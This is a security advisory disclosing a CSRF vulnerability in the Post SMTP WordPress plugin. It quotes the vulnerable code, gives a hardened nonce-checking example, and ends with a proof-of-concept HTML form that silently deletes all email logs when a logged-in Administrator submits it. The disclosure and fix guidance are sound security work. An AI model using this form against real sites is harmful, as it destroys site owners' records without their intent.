16 Aug

Cross-Site Request Forgery (CSRF) Vulnerability in Post SMTP

As part of the security review of the Post SMTP plugin that we did after our customers selected it for review, we found that the plugin contains a cross-site request forgery (CSRF) vulnerability that allows all of the plugin’s email logging to be deleted.

The plugin’s Email Log admin page is registered for users with the plugin’s MANAGE_POSTMAN_CAPABILITY_LOGS capability:

$page = add_submenu_page( PostmanViewController::POSTMAN_MENU_SLUG, $pageTitle, $pluginName, Postman::MANAGE_POSTMAN_CAPABILITY_LOGS, 'postman_email_log', array( $this, 'postman_render_email_page' ) );

By default only Administrators have that capability.

When that page is accessed the function postman_render_email_page() is called, which in turn calls the function prepare_items():

function postman_render_email_page() {

	// Create an instance of our package class...
	$testListTable = new PostmanEmailLogView();
	wp_enqueue_script( 'postman_resend_email_script' );
	// Fetch, prepare, sort, and filter our data...
	$testListTable->prepare_items();

In prepare_items(), if the POST input “postman_trash_all” exists, every email log entry (each stored as a post) is permanently deleted:

if ( isset( $_POST['postman_trash_all'] ) ) {
	foreach ( $posts->posts as $post ) {
		wp_delete_post( $post->ID, true );

No check for a valid nonce is done before that happens, so an attacker could cause a logged-in Administrator to trigger the deletion without intending to, for example by getting them to visit a page that auto-submits a form to the Email Log page.
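To show what the missing protection looks like, here is the vulnerable branch from prepare_items() next to a hardened version. This is an added example written for this post, not Post SMTP’s own code or the developer’s fix. It assumes it runs inside WordPress (so check_admin_referer(), wp_nonce_field(), current_user_can(), wp_die() and wp_delete_post() are available); the nonce action name postman_trash_all_logs and field name postman_trash_all_nonce are illustrative names chosen here, not identifiers from the plugin.

```php
<?php
// Added example, not Post SMTP's code. Runs inside WordPress; the nonce
// action and field names below are hypothetical and chosen for this example.

const TRASH_ALL_ACTION = 'postman_trash_all_logs';   // hypothetical nonce action
const TRASH_ALL_NONCE  = 'postman_trash_all_nonce';  // hypothetical nonce field name

// Vulnerable: any POST carrying the parameter deletes every log entry.
// A form on a third-party site (like the proof of concept) is enough,
// because nothing ties the request to a page the Administrator rendered.
function trash_all_logs_vulnerable( $posts ) {
	if ( isset( $_POST['postman_trash_all'] ) ) {
		foreach ( $posts->posts as $post ) {
			wp_delete_post( $post->ID, true );
		}
	}
}

// Hardened: require a POST, the plugin's capability, and a valid nonce
// before deleting anything. check_admin_referer() calls wp_die() when the
// nonce is missing or invalid, so a forged request never reaches the loop.
function trash_all_logs_hardened( $posts ) {
	if ( 'POST' !== $_SERVER['REQUEST_METHOD'] || ! isset( $_POST['postman_trash_all'] ) ) {
		return;
	}
	if ( ! current_user_can( Postman::MANAGE_POSTMAN_CAPABILITY_LOGS ) ) {
		wp_die( 'Insufficient permissions.' );
	}
	// Verifies $_POST[TRASH_ALL_NONCE] against the action for the current user.
	check_admin_referer( TRASH_ALL_ACTION, TRASH_ALL_NONCE );
	foreach ( $posts->posts as $post ) {
		wp_delete_post( $post->ID, true );
	}
}

// The legitimate "trash all" form must emit the matching nonce (wp_nonce_field()
// also adds _wp_http_referer) so real submissions pass the check above.
function render_trash_all_form() {
	?>
	<form method="post">
		<?php wp_nonce_field( TRASH_ALL_ACTION, TRASH_ALL_NONCE ); ?>
		<input type="submit" name="postman_trash_all" value="Trash all logs" />
	</form>
	<?php
}
```

WordPress nonces are derived from the logged-in user’s session and the action name, so a page on another origin cannot read or predict the value; the proof of concept form below carries no nonce field and would be rejected by the hardened version before the deletion loop is reached. Checking the capability again inside the handler is defence in depth, since add_submenu_page() only gates access to the menu entry.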

Proof of Concept

The following proof of concept will delete all of the email logging.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin.php?page=postman_email_log" method="POST">
<input type="hidden" name="postman_trash_all" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

8/5/2019 – Developer notified.


Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service, you can suggest/vote for the WordPress plugins you use to receive a security review from us. You can start using the service for free when you sign up now. We also offer security reviews of WordPress plugins as a separate service.